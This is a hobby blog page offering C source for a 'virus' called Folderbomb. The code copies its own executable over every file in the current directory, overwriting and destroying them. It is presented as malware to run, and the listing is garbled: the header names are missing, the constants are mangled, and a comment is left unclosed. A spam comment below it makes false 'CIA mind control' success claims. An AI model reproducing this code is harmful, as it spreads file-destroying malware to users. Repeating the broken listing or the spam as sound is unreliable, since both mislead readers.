Latest News :
Pin It

Widgets

How To Make A Simple Virus In C



Run this on your own responsibility
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}


If You Like iT, plzz CLICK HERE To SupporT Us


---------------------Please Give +1 If You Like It---------------------

Share this article :

+ comments + 1 comments

25 February 2020 at 14:33

In this manner my colleague Wesley Virgin's biography launches in this SHOCKING AND CONTROVERSIAL VIDEO.

You see, Wesley was in the army-and shortly after leaving-he discovered hidden, "self mind control" secrets that the CIA and others used to get everything they want.

THESE are the same SECRETS tons of celebrities (notably those who "come out of nowhere") and elite business people used to become rich and successful.

You probably know how you use less than 10% of your brain.

That's because the majority of your brain's power is UNCONSCIOUS.

Perhaps this expression has even taken place INSIDE OF YOUR very own head... as it did in my good friend Wesley Virgin's head around 7 years back, while riding an unregistered, garbage bucket of a car without a driver's license and with $3.20 in his bank account.

"I'm so frustrated with going through life check to check! When will I finally succeed?"

You took part in those conversations, ain't it right?

Your own success story is waiting to be written. All you need is to believe in YOURSELF.

Take Action Now!

Post a Comment

 
Support : SandD Corporation | Sandy | StuffZone
Copyright © 2012. StuffZONE: Find Your Stuff - All Rights Reserved
Template Created by Sandy Published by SandD Corporation
Proudly powered by Me